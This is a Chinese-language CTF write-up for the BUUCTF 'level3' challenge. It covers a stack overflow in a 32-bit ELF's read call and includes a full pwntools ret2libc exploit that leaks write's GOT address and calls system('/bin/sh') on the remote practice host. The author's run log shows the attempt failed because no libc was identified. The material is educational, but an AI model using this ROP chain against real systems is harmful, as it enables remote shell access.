分析

  1. checksec
checksec --file=level3 
RELRO STACK CANARY NX PIE RPATH RUNPATH Symbols FORTIFY Fortified Fortifiable FILE
Partial RELRO No canary found NX enabled No PIE No RPATH No RUNPATH 69) Symbols No 0 1 level3
  1. file
file level3 
level3: ELF 32-bit LSB executable, Intel 80386, version 1 (SYSV), dynamically linked, interpreter /lib/ld-linux.so.2, for GNU/Linux 2.6.32, BuildID[sha1]=44a438e03b4d2c1abead90f748a4b5500b7a04c7, not stripped
  1. ida

main:

int __cdecl main(int argc, const char **argv, const char **envp)
{
    /* Entry point of level3 (decompiled). The prompt-and-read routine runs
       first; the greeting is written to stdout only after it returns.
       argc/argv/envp are unused. */
    static const char greeting[] = "Hello, World!\n";

    vulnerable_function();
    /* sizeof greeting - 1 == 0xE: the 14 bytes of the string without NUL. */
    write(1, greeting, sizeof greeting - 1);
    return 0;
}

vulnerable_function:

ssize_t vulnerable_function()
{
/* Decompiled input routine; the bug of this challenge lives here.
   read() may copy up to 0x100 (256) bytes, but buf holds only 136 (0x88)
   bytes and IDA places it at ebp-0x88, so anything past 136 bytes runs over
   the saved ebp and the return address. checksec above reports no stack
   canary, so nothing detects the overwrite before the function returns.
   The fix is to bound the read by the buffer: read(0, buf, sizeof buf). */
char buf[136]; // [esp+0h] [ebp-88h] BYREF

write(1, "Input:\n", 7u);
return read(0, buf, 0x100u);
}

read函数在这里造成栈溢出: buf只有136字节,而read最多读入0x100(256)字节。

搜一下字符串,也没发现有bin/sh,system等,看来只能自己构造了。

利用思路也很清晰,就是搜索libc版本,最后溢出调用system函数,传参bin/sh

利用

from pwn import *
from LibcSearcher import *
# Flat script: the remote connection is opened as soon as the module runs.
r = remote('node5.buuoj.cn',25103)
elf = ELF('./level3')
# Hard-coded address of main: checksec reports "No PIE", so .text addresses
# are fixed for this binary.
main = 0x8048484
write_plt = elf.plt['write']
write_got = elf.got['write']
# Stage 1 payload. IDA places buf at ebp-0x88, so 0x88+4 bytes of padding
# cover buf and the saved ebp and land on the return address. The return
# address is replaced by write@plt; the next word (main) is where write
# returns, and the words after it are write's stack arguments, so the
# program prints the resolved address of write from its GOT slot and then
# re-enters main for a second input.
buf = b'a'*(0x88+4) + p32(write_plt) + p32(main) + p32(1) + p32(write_got) + p32(write_got) + p32(4)
# NOTE(review): recvuntil is given a str here; pwntools prints the
# BytesWarning visible in the run log below. b'Input:\n' would avoid it.
r.recvuntil('Input:\n')
r.sendline(buf)
# Leaked GOT value of write, little-endian.
write_addr = u32(r.recv(4))
# Stage 2 depends entirely on identifying the remote libc from this one
# leaked address; per the run log below the lookup returned no match
# ("No libc satisfies constraints"), so the lines after it never succeeded.
libc = LibcSearcher('write',write_addr)
libc_base = write_addr - libc.dump('write')
system = libc_base + libc.dump('system')
sh = libc_base + libc.dump('str_bin_sh')
# Stage 2 payload: same padding, then system as the return address, main as
# system's return address and sh as its single argument.
buf = b'a'*(0x88+4) + p32(system) + p32(main) + p32(sh)
r.recvuntil('Input:\n')
r.sendline(buf)
r.interactive()

最后没打通,原因是没查到libc版本。。。

pwn python3 level3.py 
[+] Opening connection to node5.buuoj.cn on port 25103: Done
[*] '/home/admin233/pwn/level3'
Arch: i386-32-little
RELRO: Partial RELRO
Stack: No canary found
NX: NX enabled
PIE: No PIE (0x8048000)
Stripped: No
/home/admin233/pwn/level3.py:9: BytesWarning: Text is not bytes; assuming ASCII, no guarantees. See https://docs.pwntools.com/#bytes
r.recvuntil('Input:\n')
[+] No libc satisfies constraints.
[*] Closed connection to node5.buuoj.cn port 25103

试了好多方法,网上基本上都说在云端搜索,理论可行,但是还是查不到,然后想尝试扩充本地libc数据库,且不说数据量大不大,直接get不下来,玩啥哦。

curl -X POST -H 'Content-Type: application/json' --data '{"symbols": ["strcat"]}' 'https://libc.rip/api/libc/libc6_2.27-3ubuntu1.2_amd64'
{
"buildid": "d3cf764b2f97ac3efe366ddd07ad902fb6928fd7",
"download_url": "https://libc.rip/download/libc6_2.27-3ubuntu1.2_amd64.so",
"id": "libc6_2.27-3ubuntu1.2_amd64",
"libs_url": "http://archive.ubuntu.com/ubuntu/pool/main/g/glibc//libc6_2.27-3ubuntu1.2_amd64.deb",
"md5": "35ef4ffc9c6ad7ffd1fd8c16f14dc766",
"sha1": "a22321cd65f28f70cf321614fdfd22f36ecd0afe",
"sha256": "f0ad9639b2530741046e06c96270b25da2339b6c15a7ae46de8fb021b3c4f529",
"symbols": {
"__libc_start_main_ret": "0x21b97",
"dup2": "0x110ab0",
"printf": "0x64f00",
"puts": "0x80a30",
"read": "0x110180",
"str_bin_sh": "0x1b40fa",
"strcat": "0x9d800",
"system": "0x4f4e0",
"write": "0x110250"
},
"symbols_url": "https://libc.rip/download/libc6_2.27-3ubuntu1.2_amd64.symbols"
}